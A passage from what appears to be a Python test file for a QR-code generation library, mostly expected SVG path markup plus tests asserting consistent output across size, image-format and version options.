9.6 L 14.4 10.4 L 15.2 10.4 L 15.2 9.6 z M 8 16 L 8 16.8 L 8.8 16.8 L 8.8 16 z M 12.8 9.6 L 12.8 10.4 L 13.6 10.4 L 13.6 9.6 z M 19.2 16 L 19.2 16.8 L 20.0 16.8 L 20.0 16 z M 17.6 3.2 L 17.6 4.0 L 18.4 4.0 L 18.4 3.2 z M 16.8 9.6 L 16.8 10.4 L 17.6 10.4 L 17.6 9.6 z M 19.2 5.6 L 19.2 6.4 L 20.0 6.4 L 20.0 5.6 z M 4.8 17.6 L 4.8 18.4 L 5.6 18.4 L 5.6 17.6 z M 17.6 15.2 L 17.6 16.0 L 18.4 16.0 L 18.4 15.2 z M 3.2 14.4 L 3.2 15.2 L 4.0 15.2 L 4.0 14.4 z M 4.8 12.8 L 4.8 13.6 L 5.6 13.6 L 5.6 12.8 z M 5.6 16.8 L 5.6 17.6 L 6.4 17.6 L 6.4 16.8 z M 8 14.4 L 8 15.2 L 8.8 15.2 L 8.8 14.4 z M 12 11.2 L 12 12.0 L 12.8 12.0 L 12.8 11.2 z M 16.8 8 L 16.8 8.8 L 17.6 8.8 L 17.6 8 z M 14.4 7.2 L 14.4 8.0 L 15.2 8.0 L 15.2 7.2 z M 12.8 13.6 L 12.8 14.4 L 13.6 14.4 L 13.6 13.6 z M 16.8 12 L 16.8 12.8 L 17.6 12.8 L 17.6 12 z M 15.2 3.2 L 15.2 4.0 L 16.0 4.0 L 16.0 3.2 z M 19.2 3.2 L 19.2 4.0 L 20.0 4.0 L 20.0 3.2 z M 3.2 12 L 3.2 12.8 L 
4.0 12.8 L 4.0 12 z M 5.6 8 L 5.6 8.8 L 6.4 8.8 L 6.4 8 z M 4.8 4.8 L 4.8 5.6 L 5.6 5.6 L 5.6 4.8 z M 4 11.2 L 4 12.0 L 4.8 12.0 L 4.8 11.2 z M 9.6 8 L 9.6 8.8 L 10.4 8.8 L 10.4 8 z M 10.4 8.8 L 10.4 9.6 L 11.2 9.6 L 11.2 8.8 z M 8 6.4 L 8 7.2 L 8.8 7.2 L 8.8 6.4 z M 12 6.4 L 12 7.2 L 12.8 7.2 L 12.8 6.4 z M 11.2 6.4 L 11.2 7.2 L 12.0 7.2 L 12.0 6.4 z M 10.4 19.2 L 10.4 20.0 L 11.2 20.0 L 11.2 19.2 z M 16 6.4 L 16 7.2 L 16.8 7.2 L 16.8 6.4 z M 12.8 8.8 L 12.8 9.6 L 13.6 9.6 L 13.6 8.8 z M 3.2 17.6 L 3.2 18.4 L 4.0 18.4 L 4.0 17.6 z M 14.4 8 L 14.4 8.8 L 15.2 8.8 L 15.2 8 z M 12.8 17.6 L 12.8 18.4 L 13.6 18.4 L 13.6 17.6 z M 17.6 8 L 17.6 8.8 L 18.4 8.8 L 18.4 8 z M 3.2 7.2 L 3.2 8.0 L 4.0 8.0 L 4.0 7.2 z M 13.6 18.4 L 13.6 19.2 L 14.4 19.2 L 14.4 18.4 z M 19.2 7.2 L 19.2 8.0 L 20.0 8.0 L 20.0 7.2 z M 4 3.2 L 4 4.0 L 4.8 4.0 L 4.8 3.2 z M 3.2 9.6 L 3.2 10.4 L 4.0 10.4 L 4.0 9.6 z M 10.4 13.6 L 10.4 14.4 L 11.2 14.4 L 11.2 13.6 z M 9.6 5.6 L 9.6 6.4 L 10.4 6.4 L 10.4 5.6 z M 6.4 8 L 6.4 8.8 L 7.2 8.8 L 7.2 8 z M 8 4 L 8 4.8 L 8.8 4.8 L 8.8 4 z M 6.4 16.8 L 6.4 17.6 L 7.2 17.6 L 7.2 16.8 z M 14.4 12.8 L 14.4 13.6 L 15.2 13.6 L 15.2 12.8 z M 7.2 19.2 L 7.2 20.0 L 8.0 20.0 L 8.0 19.2 z M 12.8 6.4 L 12.8 7.2 L 13.6 7.2 L 13.6 6.4 z M 8 19.2 L 8 20.0 L 8.8 20.0 L 8.8 19.2 z M 11.2 19.2 L 11.2 20.0 L 12.0 20.0 L 12.0 19.2 z M 12 19.2 L 12 20.0 L 12.8 20.0 L 12.8 19.2 z M 15.2 10.4 L 15.2 11.2 L 16.0 11.2 L 16.0 10.4 z M 14.4 5.6 L 14.4 6.4 L 15.2 6.4 L 15.2 5.6 z M 13.6 10.4 L 13.6 11.2 L 14.4 11.2 L 14.4 10.4 z M 16 19.2 L 16 20.0 L 16.8 20.0 L 16.8 19.2 z M 17.6 12 L 17.6 12.8 L 18.4 12.8 L 18.4 12 z M 3.2 4.8 L 3.2 5.6 L 4.0 5.6 L 4.0 4.8 z M 16.8 16.8 L 16.8 17.6 L 17.6 17.6 L 17.6 16.8 z M 9.6 13.6 L 9.6 14.4 L 10.4 14.4 L 10.4 13.6 z M 6.4 9.6 L 6.4 10.4 L 7.2 10.4 L 7.2 9.6 z M 5.6 3.2 L 5.6 4.0 L 6.4 4.0 L 6.4 3.2 z M 4.8 9.6 L 4.8 10.4 L 5.6 10.4 L 5.6 9.6 z M 10.4 9.6 L 10.4 10.4 L 11.2 10.4 L 11.2 9.6 z M 11.2 15.2 L 11.2 16.0 L 12.0 16.0 L 12.0 15.2 z M 8 4.8 L 8 5.6 L 8.8 5.6 L 8.8 4.8 z M 10.4 17.6 L 10.4 18.4 L 11.2 18.4 L 11.2 17.6 z M 14.4 10.4 L 14.4 11.2 L 15.2 11.2 L 15.2 10.4 z M 8 16.8 L 8 17.6 L 8.8 17.6 L 8.8 16.8 z M 12.8 10.4 L 12.8 11.2 L 13.6 11.2 L 13.6 10.4 z M 4 19.2 L 4 20.0 L 4.8 20.0 L 4.8 19.2 z M 16.8 15.2 L 16.8 16.0 L 17.6 16.0 L 17.6 15.2 z M 16 16.8 L 16 17.6 L 16.8 17.6 L 16.8 16.8 z M 13.6 12.8 L 13.6 13.6 L 14.4 13.6 L 14.4 12.8 z M 19.2 12.8 L 19.2 13.6 L 20.0 13.6 L 20.0 12.8 z M 12.8 19.2 L 12.8 20.0 L 13.6 20.0 L 13.6 19.2 z M 3.2 15.2 L 3.2 16.0 L 4.0 16.0 L 4.0 15.2 z M 5.6 11.2 L 5.6 12.0 L 6.4 12.0 L 6.4 11.2 z M 4 14.4 L 4 15.2 L 4.8 15.2 L 4.8 14.4 z M 10.4 12 L 10.4 12.8 L 11.2 12.8 L 11.2 12 z M 7.2 3.2 L 7.2 4.0 L 8.0 4.0 L 8.0 3.2 z M 5.6 16 L 5.6 16.8 L 6.4 16.8 L 6.4 16 z M 11.2 3.2 L 11.2 4.0 L 12.0 4.0 L 12.0 3.2 z M 9.6 16 L 9.6 16.8 L 10.4 16.8 L 10.4 16 z M 8 15.2 L 8 16.0 L 8.8 16.0 L 8.8 15.2 z M 16 12 L 16 12.8 L 16.8 12.8 L 16.8 12 z M 14.4 11.2 L 14.4 12.0 L 15.2 12.0 L 15.2 11.2 z M 8 17.6 L 8 18.4 L 8.8 18.4 L 8.8 17.6 z M 12.8 14.4 L 12.8 15.2 L 13.6 15.2 L 13.6 14.4 z M 18.4 8 L 18.4 8.8 L 19.2 8.8 L 19.2 8 z M 17.6 4.8 L 17.6 5.6 L 18.4 5.6 L 18.4 4.8 z M 16.8 11.2 L 16.8 12.0 L 17.6 12.0 L 17.6 11.2 z M 13.6 15.2 L 13.6 16.0 L 14.4 16.0 L 14.4 15.2 z M 19.2 4 L 19.2 4.8 L 20.0 4.8 L 20.0 4 z M 4.8 19.2 L 4.8 20.0 L 5.6 20.0 L 5.6 19.2 z M 5.6 10.4 L 5.6 11.2 L 6.4 11.2 L 6.4 10.4 z M 4.8 5.6 L 4.8 6.4 L 5.6 6.4 L 5.6 5.6 z M 9.6 8.8 L 9.6 9.6 L 10.4 9.6 L 10.4 8.8 z M 6.4 4.8 L 6.4 5.6 L 7.2 5.6 L 7.2 4.8 z M 4.8 14.4 L 4.8 
15.2 L 5.6 15.2 L 5.6 14.4 z M 8 7.2 L 8 8.0 L 8.8 8.0 L 8.8 7.2 z M 12 8.8 L 12 9.6 L 12.8 9.6 L 12.8 8.8 z M 11.2 7.2 L 11.2 8.0 L 12.0 8.0 L 12.0 7.2 z M 8 9.6 L 8 10.4 L 8.8 10.4 L 8.8 9.6 z M 14.4 16 L 14.4 16.8 L 15.2 16.8 L 15.2 16 z M 18.4 16 L 18.4 16.8 L 19.2 16.8 L 19.2 16 z M 16.8 3.2 L 16.8 4.0 L 17.6 4.0 L 17.6 3.2 z M 16 9.6 L 16 10.4 L 16.8 10.4 L 16.8 9.6 z M 3.2 18.4 L 3.2 19.2 L 4.0 19.2 L 4.0 18.4 z M 12.8 18.4 L 12.8 19.2 L 13.6 19.2 L 13.6 18.4 z M 3.2 8 L 3.2 8.8 L 4.0 8.8 L 4.0 8 z M 15.2 8 L 15.2 8.8 L 16.0 8.8 L 16.0 8 z M 19.2 8 L 19.2 8.8 L 20.0 8.8 L 20.0 8 z M 17.6 17.6 L 17.6 18.4 L 18.4 18.4 L 18.4 17.6 z M 5.6 6.4 L 5.6 7.2 L 6.4 7.2 L 6.4 6.4 z M 4.8 6.4 L 4.8 7.2 L 5.6 7.2 L 5.6 6.4 z M 10.4 12.8 L 10.4 13.6 L 11.2 13.6 L 11.2 12.8 z M 9.6 6.4 L 9.6 7.2 L 10.4 7.2 L 10.4 6.4 z M 11.2 12 L 11.2 12.8 L 12.0 12.8 L 12.0 12 z M 8 8 L 8 8.8 L 8.8 8.8 L 8.8 8 z M 7.2 8 L 7.2 8.8 L 8.0 8.8 L 8.0 8 z M 6.4 17.6 L 6.4 18.4 L 7.2 18.4 L 7.2 17.6 z M 12 4.8 L 12 5.6 L 12.8 5.6 L 12.8 4.8 z M 11.2 8 L 11.2 8.8 L 12.0 8.8 L 12.0 8 z M 16 4.8 L 16 5.6 L 16.8 5.6 L 16.8 4.8 z M 12.8 7.2 L 12.8 8.0 L 13.6 8.0 L 13.6 7.2 z M 16.8 5.6 L 16.8 6.4 L 17.6 6.4 L 17.6 5.6 z M 15.2 9.6 L 15.2 10.4 L 16.0 10.4 L 16.0 9.6 z M 14.4 3.2 L 14.4 4.0 L 15.2 4.0 L 15.2 3.2 z M 3.2 16 L 3.2 16.8 L 4.0 16.8 L 4.0 16 z M 12.8 16 L 12.8 16.8 L 13.6 16.8 L 13.6 16 z M 18.4 3.2 L 18.4 4.0 L 19.2 4.0 L 19.2 3.2 z M 17.6 9.6 L 17.6 10.4 L 18.4 10.4 L 18.4 9.6 z M 3.2 5.6 L 3.2 6.4 L 4.0 6.4 L 4.0 5.6 z M 5.6 14.4 L 5.6 15.2 L 6.4 15.2 L 6.4 14.4 z M 6.4 10.4 L 6.4 11.2 L 7.2 11.2 L 7.2 10.4 z M 5.6 5.6 L 5.6 6.4 L 6.4 6.4 L 6.4 5.6 z M 4.8 10.4 L 4.8 11.2 L 5.6 11.2 L 5.6 10.4 z M 10.4 15.2 L 10.4 16.0 L 11.2 16.0 L 11.2 15.2 z M 7.2 12.8 L 7.2 13.6 L 8.0 13.6 L 8.0 12.8 z M 6.4 6.4 L 6.4 7.2 L 7.2 7.2 L 7.2 6.4 z M 5.6 19.2 L 5.6 20.0 L 6.4 20.0 L 6.4 19.2 z M 11.2 12.8 L 11.2 13.6 L 12.0 13.6 L 12.0 12.8 z M 9.6 19.2 L 9.6 20.0 L 10.4 20.0 L 10.4 19.2 z M 8 5.6 L 8 6.4 L 8.8 6.4 L 8.8 5.6 z M 10.4 16.8 L 10.4 17.6 L 11.2 17.6 L 11.2 16.8 z M 15.2 17.6 L 15.2 18.4 L 16.0 18.4 L 16.0 17.6 z M 14.4 14.4 L 14.4 15.2 L 15.2 15.2 L 15.2 14.4 z M 18.4 11.2 L 18.4 12.0 L 19.2 12.0 L 19.2 11.2 z M 15.2 15.2 L 15.2 16.0 L 16.0 16.0 L 16.0 15.2 z M 13.6 12 L 13.6 12.8 L 14.4 12.8 L 14.4 12 z M 4.8 16 L 4.8 16.8 L 5.6 16.8 L 5.6 16 z M 3.2 3.2 L 3.2 4.0 L 4.0 4.0 L 4.0 3.2 z M 16.8 18.4 L 16.8 19.2 L 17.6 19.2 L 17.6 18.4 z M 6.4 14.4 L 6.4 15.2 L 7.2 15.2 L 7.2 14.4 z M 11.2 4 L 11.2 4.8 L 12.0 4.8 L 12.0 4 z M 9.6 16.8 L 9.6 17.6 L 10.4 17.6 L 10.4 16.8 z M 8 12.8 L 8 13.6 L 8.8 13.6 L 8.8 12.8 z M 14.4 19.2 L 14.4 20.0 L 15.2 20.0 L 15.2 19.2 z M 6.4 19.2 L 6.4 20.0 L 7.2 20.0 L 7.2 19.2 z M 12 12.8 L 12 13.6 L 12.8 13.6 L 12.8 12.8 z M 18.4 19.2 L 18.4 20.0 L 19.2 20.0 L 19.2 19.2 z M 16.8 6.4 L 16.8 7.2 L 17.6 7.2 L 17.6 6.4 z M 8.8 10.4 L 8.8 11.2 L 9.6 11.2 L 9.6 10.4 z M 15.2 16.8 L 15.2 17.6 L 16.0 17.6 L 16.0 16.8 z M 8 18.4 L 8 19.2 L 8.8 19.2 L 8.8 18.4 z M 12.8 15.2 L 12.8 16.0 L 13.6 16.0 L 13.6 15.2 z M 17.6 5.6 L 17.6 6.4 L 18.4 6.4 L 18.4 5.6 z M 16.8 10.4 L 16.8 11.2 L 17.6 11.2 L 17.6 10.4 z M 19.2 4.8 L 19.2 5.6 L 20.0 5.6 L 20.0 4.8 z M 17.6 14.4 L 17.6 15.2 L 18.4 15.2 L 18.4 14.4 z M 5.6 9.6 L 5.6 10.4 L 6.4 10.4 L 6.4 9.6 z M 4.8 3.2 L 4.8 4.0 L 5.6 4.0 L 5.6 3.2 z M 6.4 5.6 L 6.4 6.4 L 7.2 6.4 L 7.2 5.6 z M 10.4 7.2 L 10.4 8.0 L 11.2 8.0 L 11.2 7.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
results = [rt] * 2 + [rs] * 2 + [rm] * 5 + [rl] * 2 + [rh] * 2 + [r6] * 2 + [r8] * 2
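# There is an expected SVG in `results` for each entry in `sizes`; the same markup must be
# produced whichever way the size and image format are supplied, and an unknown image_format
# yields the same (SVG) output as the default, as asserted below.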
for i in range(len(sizes)):
    size = sizes[i]
    print('Testing SVG with size %s' % size)
    result = results[i]
    qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(size=size))
    qr2 = qr_from_text(TEST_TEXT, size=size)
    qr3 = qr_from_text(TEST_TEXT, size=size, image_format='svg')
    qr4 = qr_from_text(TEST_TEXT, options=QRCodeOptions(size=size, image_format='svg'))
    qr5 = qr_from_text(TEST_TEXT, size=size, image_format='invalid-format-name')
    self.assertEqual(qr1, qr2)
    self.assertEqual(qr1, qr3)
    self.assertEqual(qr1, qr4)
    self.assertEqual(qr1, qr5)
    self.assertEqual(qr1, result)
    # print("\"\"\"%s\"\"\"," % qr1)
    # print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_version(self):
versions = [None, -1, 0, 41, '-1', '0', '41', 'blabla', 1, '1', 2, '2', 4, '4']
default_result = """<svg height="52.2mm" version="1.1" viewBox="0 0 52.2 52.2" width="52.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 32.4 37.8 L 32.4 39.6 L 34.2 39.6 L 34.2 37.8 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 25.2 37.8 L 25.2 39.6 L 27.0 39.6 L 27.0 37.8 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 36 23.4 L 36 25.2 L 37.8 25.2 L 37.8 23.4 z M 32.4 14.4 L 32.4 16.2 L 34.2 16.2 L 34.2 14.4 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 30.6 37.8 L 30.6 39.6 L 32.4 39.6 L 32.4 37.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 7.2 25.2 L 7.2 27.0 L 9.0 27.0 L 9.0 25.2 z M 39.6 41.4 L 39.6 43.2 L 41.4 43.2 L 41.4 41.4 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 16.2 21.6 L 16.2 23.4 L 18.0 23.4 L 18.0 21.6 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 25.2 21.6 L 25.2 23.4 L 27.0 23.4 L 27.0 21.6 z M 23.4 7.2 L 23.4 9.0 L 25.2 9.0 L 25.2 7.2 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 36 12.6 L 36 14.4 L 37.8 14.4 L 37.8 12.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 41.4 32.4 L 41.4 34.2 L 43.2 34.2 L 43.2 32.4 z M 37.8 10.8 L 37.8 12.6 L 39.6 12.6 L 39.6 10.8 z M 7.2 37.8 L 7.2 39.6 L 9.0 39.6 L 9.0 37.8 z M 32.4 9 L 32.4 10.8 L 34.2 10.8 L 34.2 9 z M 43.2 23.4 L 43.2 25.2 L 45.0 25.2 L 45.0 23.4 z M 39.6 23.4 L 39.6 25.2 L 41.4 25.2 L 41.4 23.4 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 21.6 34.2 L 21.6 36.0 L 23.4 36.0 L 23.4 34.2 z M 14.4 25.2 L 14.4 27.0 L 16.2 27.0 L 16.2 25.2 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 23.4 32.4 L 23.4 34.2 L 25.2 34.2 L 25.2 32.4 z M 21.6 10.8 L 21.6 12.6 L 23.4 12.6 L 23.4 10.8 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 27 7.2 L 27 9.0 L 28.8 9.0 L 28.8 7.2 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 36 7.2 L 36 9.0 L 37.8 9.0 L 37.8 7.2 z M 37.8 30.6 L 37.8 32.4 L 39.6 32.4 L 39.6 30.6 z M 36 41.4 L 36 43.2 L 37.8 43.2 L 37.8 41.4 z M 32.4 10.8 L 32.4 12.6 L 34.2 12.6 L 34.2 10.8 z M 30.6 25.2 L 30.6 27.0 L 32.4 27.0 L 32.4 25.2 z M 10.8 37.8 L 10.8 39.6 L 12.6 39.6 L 12.6 37.8 z M 39.6 25.2 L 39.6 27.0 L 41.4 27.0 L 41.4 25.2 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 21.6 28.8 L 21.6 30.6 L 23.4 30.6 L 23.4 28.8 z M 16.2 32.4 L 16.2 34.2 L 18.0 34.2 L 18.0 32.4 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 21.6 39.6 L 21.6 41.4 L 23.4 41.4 L 23.4 39.6 z M 27 34.2 L 27 36.0 L 28.8 36.0 L 28.8 34.2 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 41.4 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 32.4 21.6 L 32.4 23.4 L 34.2 23.4 L 34.2 21.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 28.8 21.6 L 28.8 23.4 L 30.6 23.4 L 30.6 21.6 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 37.8 21.6 L 37.8 23.4 L 39.6 23.4 L 39.6 21.6 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 39.6 34.2 L 39.6 36.0 L 41.4 36.0 L 41.4 34.2 z M 7.2 32.4 L 7.2 34.2 L 9.0 34.2 L 9.0 32.4 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 12.6 37.8 L 12.6 39.6 L 14.4 39.6 L 14.4 37.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 27 25.2 L 27 27.0 L 28.8 27.0 L 28.8 25.2 z M 37.8 18 L 37.8 19.8 L 39.6 19.8 L 39.6 18 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 28.8 30.6 L 28.8 32.4 L 30.6 
32.4 L 30.6 30.6 z M 37.8 27 L 37.8 28.8 L 39.6 28.8 L 39.6 27 z M 34.2 7.2 L 34.2 9.0 L 36.0 9.0 L 36.0 7.2 z M 43.2 7.2 L 43.2 9.0 L 45.0 9.0 L 45.0 7.2 z M 7.2 27 L 7.2 28.8 L 9.0 28.8 L 9.0 27 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 9 25.2 L 9 27.0 L 10.8 27.0 L 10.8 25.2 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 23.4 19.8 L 23.4 21.6 L 25.2 21.6 L 25.2 19.8 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 25.2 14.4 L 25.2 16.2 L 27.0 16.2 L 27.0 14.4 z M 23.4 43.2 L 23.4 45.0 L 25.2 45.0 L 25.2 43.2 z M 36 14.4 L 36 16.2 L 37.8 16.2 L 37.8 14.4 z M 28.8 19.8 L 28.8 21.6 L 30.6 21.6 L 30.6 19.8 z M 7.2 39.6 L 7.2 41.4 L 9.0 41.4 L 9.0 39.6 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 28.8 39.6 L 28.8 41.4 L 30.6 41.4 L 30.6 39.6 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 30.6 41.4 L 30.6 43.2 L 32.4 43.2 L 32.4 41.4 z M 43.2 16.2 L 43.2 18.0 L 45.0 18.0 L 45.0 16.2 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 23.4 30.6 L 23.4 32.4 L 25.2 32.4 L 25.2 30.6 z M 21.6 12.6 L 21.6 14.4 L 23.4 14.4 L 23.4 12.6 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 14.4 37.8 L 14.4 39.6 L 16.2 39.6 L 16.2 37.8 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 16.2 43.2 L 16.2 45.0 L 18.0 45.0 L 18.0 43.2 z M 28.8 14.4 L 28.8 16.2 L 30.6 16.2 L 30.6 14.4 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 25.2 43.2 L 25.2 45.0 L 27.0 45.0 L 27.0 43.2 z M 27 43.2 L 27 45.0 L 28.8 45.0 L 28.8 43.2 z M 34.2 23.4 L 34.2 25.2 L 36.0 25.2 L 36.0 23.4 z M 32.4 12.6 L 32.4 14.4 L 34.2 14.4 L 34.2 12.6 z M 30.6 23.4 L 30.6 25.2 L 32.4 25.2 L 32.4 23.4 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 39.6 27 L 39.6 28.8 L 41.4 28.8 L 41.4 27 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 37.8 37.8 L 37.8 39.6 L 39.6 39.6 L 39.6 37.8 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 14.4 21.6 L 14.4 23.4 L 16.2 23.4 L 16.2 21.6 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 10.8 21.6 L 10.8 23.4 L 12.6 23.4 L 12.6 21.6 z M 23.4 21.6 L 23.4 23.4 L 25.2 23.4 L 25.2 21.6 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 23.4 39.6 L 23.4 41.4 L 25.2 41.4 L 25.2 39.6 z M 32.4 23.4 L 32.4 25.2 L 34.2 25.2 L 34.2 23.4 z M 18 37.8 L 18 39.6 L 19.8 39.6 L 19.8 37.8 z M 28.8 23.4 L 28.8 25.2 L 30.6 25.2 L 30.6 23.4 z M 9 43.2 L 9 45.0 L 10.8 45.0 L 10.8 43.2 z M 37.8 34.2 L 37.8 36.0 L 39.6 36.0 L 39.6 34.2 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 43.2 28.8 L 43.2 30.6 L 45.0 30.6 L 45.0 28.8 z M 28.8 43.2 L 28.8 45.0 L 30.6 45.0 L 30.6 43.2 z M 7.2 34.2 L 7.2 36.0 L 9.0 36.0 L 9.0 34.2 z M 12.6 25.2 L 12.6 27.0 L 14.4 27.0 L 14.4 25.2 z M 9 32.4 L 9 34.2 L 10.8 34.2 L 10.8 32.4 z M 23.4 27 L 23.4 28.8 L 25.2 28.8 L 25.2 27 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 12.6 36 L 12.6 37.8 L 14.4 37.8 L 14.4 36 z M 25.2 7.2 L 25.2 9.0 L 27.0 9.0 L 27.0 7.2 z M 21.6 36 L 21.6 37.8 L 23.4 37.8 L 23.4 36 z M 18 34.2 L 18 36.0 L 19.8 36.0 L 19.8 34.2 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 32.4 25.2 L 32.4 27.0 L 34.2 27.0 L 34.2 25.2 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 28.8 32.4 L 28.8 34.2 L 30.6 34.2 L 30.6 32.4 z M 41.4 18 L 41.4 19.8 L 43.2 19.8 L 43.2 18 z M 39.6 10.8 L 39.6 12.6 L 41.4 12.6 L 41.4 10.8 z M 37.8 25.2 L 
37.8 27.0 L 39.6 27.0 L 39.6 25.2 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 43.2 9 L 43.2 10.8 L 45.0 10.8 L 45.0 9 z M 10.8 43.2 L 10.8 45.0 L 12.6 45.0 L 12.6 43.2 z M 12.6 23.4 L 12.6 25.2 L 14.4 25.2 L 14.4 23.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 21.6 19.8 L 21.6 21.6 L 23.4 21.6 L 23.4 19.8 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 10.8 32.4 L 10.8 34.2 L 12.6 34.2 L 12.6 32.4 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 27 19.8 L 27 21.6 L 28.8 21.6 L 28.8 19.8 z M 25.2 16.2 L 25.2 18.0 L 27.0 18.0 L 27.0 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 32.4 36 L 32.4 37.8 L 34.2 37.8 L 34.2 36 z M 41.4 36 L 41.4 37.8 L 43.2 37.8 L 43.2 36 z M 37.8 7.2 L 37.8 9.0 L 39.6 9.0 L 39.6 7.2 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 28.8 41.4 L 28.8 43.2 L 30.6 43.2 L 30.6 41.4 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 34.2 18 L 34.2 19.8 L 36.0 19.8 L 36.0 18 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 23.4 28.8 L 23.4 30.6 L 25.2 30.6 L 25.2 28.8 z M 21.6 14.4 L 21.6 16.2 L 23.4 16.2 L 23.4 14.4 z M 25.2 27 L 25.2 28.8 L 27.0 28.8 L 27.0 27 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 14.4 39.6 L 14.4 41.4 L 16.2 41.4 L 16.2 39.6 z M 27 10.8 L 27 12.6 L 28.8 12.6 L 28.8 10.8 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 36 10.8 L 36 12.6 L 37.8 12.6 L 37.8 10.8 z M 28.8 16.2 L 28.8 18.0 L 30.6 18.0 L 30.6 16.2 z M 37.8 12.6 L 37.8 14.4 L 39.6 14.4 L 39.6 12.6 z M 34.2 21.6 L 34.2 23.4 L 36.0 23.4 L 36.0 21.6 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 28.8 36 L 28.8 37.8 L 30.6 37.8 L 30.6 36 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 39.6 